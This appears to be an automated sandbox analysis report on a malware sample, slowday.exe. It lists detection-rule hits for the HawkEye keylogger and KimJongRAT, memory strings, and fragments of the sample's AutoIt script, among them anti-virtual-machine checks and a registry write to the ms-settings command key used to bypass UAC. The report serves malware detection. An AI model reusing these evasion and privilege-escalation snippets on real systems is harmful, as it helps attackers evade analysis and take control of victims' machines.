            Source: 8.2.RegAsm.exe.4b4834a.3.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 35.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 30.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 30.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 30.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.2.RegAsm.exe.f1834a.2.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 8.3.RegAsm.exe.43bb8f2.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.3.RegAsm.exe.47c35a8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 30.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 35.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.2.RegAsm.exe.ec0345.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 35.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 8.2.RegAsm.exe.4af0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.2.RegAsm.exe.6abdc50.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 30.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 1.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEyeV9 payload Author: ditekshen
            Source: 1.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: HawkEye v9 Payload Author: ditekshen
            Source: 1.3.RegAsm.exe.481b8f2.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.3.RegAsm.exe.47c38ed.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 8.2.RegAsm.exe.4b4834a.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 30.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEyeV9 payload Author: ditekshen
            Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: HawkEye v9 Payload Author: ditekshen
            Source: 30.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 7.3.winlogons.exe.3790000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 7.3.winlogons.exe.3790000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEyeV9 payload Author: ditekshen
            Source: 7.3.winlogons.exe.3790000.0.unpack, type: UNPACKEDPE | Matched rule: HawkEye v9 Payload Author: ditekshen
            Source: 8.3.RegAsm.exe.43bb8f2.0.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 8.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 8.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEyeV9 payload Author: ditekshen
            Source: 8.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: HawkEye v9 Payload Author: ditekshen
            Source: 30.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.3.RegAsm.exe.481b8f2.0.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 8.3.RegAsm.exe.43635a8.2.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.2.RegAsm.exe.ec0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 8.3.RegAsm.exe.43635a8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEyeV9 payload Author: ditekshen
            Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: HawkEye v9 Payload Author: ditekshen
            Source: 0.3.slowday.exe.3b50000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 0.3.slowday.exe.3b50000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEyeV9 payload Author: ditekshen
            Source: 0.3.slowday.exe.3b50000.0.unpack, type: UNPACKEDPE | Matched rule: HawkEye v9 Payload Author: ditekshen
            Source: 8.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 8.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEyeV9 payload Author: ditekshen
            Source: 8.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: HawkEye v9 Payload Author: ditekshen
            Source: 30.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 1.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEyeV9 payload Author: ditekshen
            Source: 1.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: HawkEye v9 Payload Author: ditekshen
            Source: 1.2.RegAsm.exe.ec0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 35.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 35.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 35.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 35.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.3.RegAsm.exe.47c35a8.2.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 30.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 35.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 35.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 8.3.RegAsm.exe.43638ed.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.2.RegAsm.exe.f1834a.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 8.2.RegAsm.exe.4af0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 8.2.RegAsm.exe.6771c10.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 8.2.RegAsm.exe.4af0345.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 8.2.RegAsm.exe.680dc50.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.2.RegAsm.exe.6a21c10.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.2.RegAsm.exe.6985bd0.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 0000001E.00000000.426727221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 00000008.00000002.506849716.0000000002B09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 00000001.00000002.505252954.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 00000008.00000000.279280828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 00000000.00000003.241428213.0000000003B52000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 0000001E.00000000.426172812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 00000007.00000003.279364172.0000000003792000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 00000001.00000000.241802515.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 00000001.00000002.506906598.0000000002F69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 00000008.00000000.279668892.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 00000023.00000002.478736094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 00000001.00000002.506091373.0000000000EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 00000023.00000000.476336904.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 0000001E.00000000.426437716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 0000001E.00000000.427032504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 00000008.00000002.509855006.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 0000001E.00000002.427693844.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 00000023.00000000.476920702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 00000008.00000002.505271904.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 00000001.00000000.241216625.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 00000000.00000003.238788828.0000000003960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 00000023.00000000.476609375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 00000007.00000003.277164673.0000000003790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 00000023.00000000.476081488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: Process Memory Space: slowday.exe PID: 6820, type: MEMORYSTR | Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR | Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: Process Memory Space: winlogons.exe PID: 6236, type: MEMORYSTR | Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: Process Memory Space: RegAsm.exe PID: 3736, type: MEMORYSTR | Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: slowday.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: slowday.exe, 00000000.00000002.246013311.0000000000E74000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: slowday.exe, 00000000.00000002.246013311.0000000000E74000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"
            Source: winlogons.exe, 00000007.00000002.283157637.0000000001334000.00000002.00000001.01000000.00000005.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: winlogons.exe, 00000007.00000002.283157637.0000000001334000.00000002.00000001.01000000.00000005.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"
            Source: slowday.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: slowday.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"
            Source: slowday.exe | AutoIt Script: ["vmtoolsd.exe" , "vbox.exe" ] FOR $I = "0" TO
            Source: slowday.exe | AutoIt Script: HDTNVAKFLIUTJTT = ["vmtoolsd.exe" , "vbox.exe" ] FO
            Source: slowday.exe | AutoIt Script: KDXWDDJCWHBVBEONY = DLLCALLADDRESS ("dword" , $DRCSHRX
            Source: slowday.exe | AutoIt Script: 62178 ) REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "DelegateExecute
            Source: winlogons.exe.0.dr | AutoIt Script: ["vmtoolsd.exe" , "vbox.exe" ] FOR $I = "0" TO
            Source: winlogons.exe.0.dr | AutoIt Script: HDTNVAKFLIUTJTT = ["vmtoolsd.exe" , "vbox.exe" ] FO
            Source: winlogons.exe.0.dr | AutoIt Script: KDXWDDJCWHBVBEONY = DLLCALLADDRESS ("dword" , $DRCSHRX
            Source: winlogons.exe.0.dr | AutoIt Script: 62178 ) REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "DelegateExecute
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DCE800
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DCFE40
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DD70FE
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DD6841
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DCE060
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DD8968
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DEDAF5
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DC1287
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DF6452
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DE1604
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00E47E0D
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DF6F36
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DEBF26
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FADCE8
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA08B1
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FAE0A1
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FAD090
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FAA1F1
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA4998
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA5591
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FAD950
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA7518
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FAD6B0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA7A19
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3398
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA8B90
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA7F10
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FADCD8
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA08B0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA38B7
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA5890
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA388B
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA5880
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3868
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA8445
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA8024
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3C00
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3DF9
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA39DA
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA41D8
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA45C0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA4DB0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3580
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FAD944
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA6D30
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA390D
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FACACD
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA7EC1
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3AB4
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FAD6AC
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA369C
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FACA89
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3671
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3A77
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FACA46
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3A3A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FADE37
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA6A29
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA7A20
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA361B
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3218
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3E00
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA37FA
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FAD3F8
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3BF0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, Code function: 1_2_00FA37B8
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, Code function: 1_2_00FA3777
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, Code function: 1_2_00FA5768
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, Code function: 1_2_00FA3744
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, Code function: 1_2_00FA2730
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, Code function: 1_2_00FA3711
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, Code function: 1_2_00FA7F09
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, Code function: 1_2_00FA3B0F
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, Code function: 1_2_00FADF0C
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 2_2_0044900F
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 2_2_004042EB
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 2_2_00414281
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 2_2_00410291
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 2_2_004063BB
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 2_2_00415624
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 2_2_0041668D
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 2_2_0040477F
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 2_2_0040487C
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 2_2_0043589B
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 2_2_0043BA9D
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 2_2_0043FBD3
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 6_2_0044900F
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 6_2_004042EB
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 6_2_00414281
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 6_2_00410291
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 6_2_004063BB
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 6_2_00415624
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 6_2_0041668D
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 6_2_0040477F
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 6_2_0040487C
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 6_2_0043589B
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 6_2_0043BA9D
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 6_2_0043FBD3
            Source: slowday.exe, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: slowday.exe, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: slowday.exe, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: slowday.exe, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: slowday.exe, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: slowday.exe, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: winlogons.exe.0.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: winlogons.exe.0.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: winlogons.exe.0.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: winlogons.exe.0.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: winlogons.exe.0.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: winlogons.exe.0.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, Section loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, Section loaded: sfc.dll
            Source: slowday.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
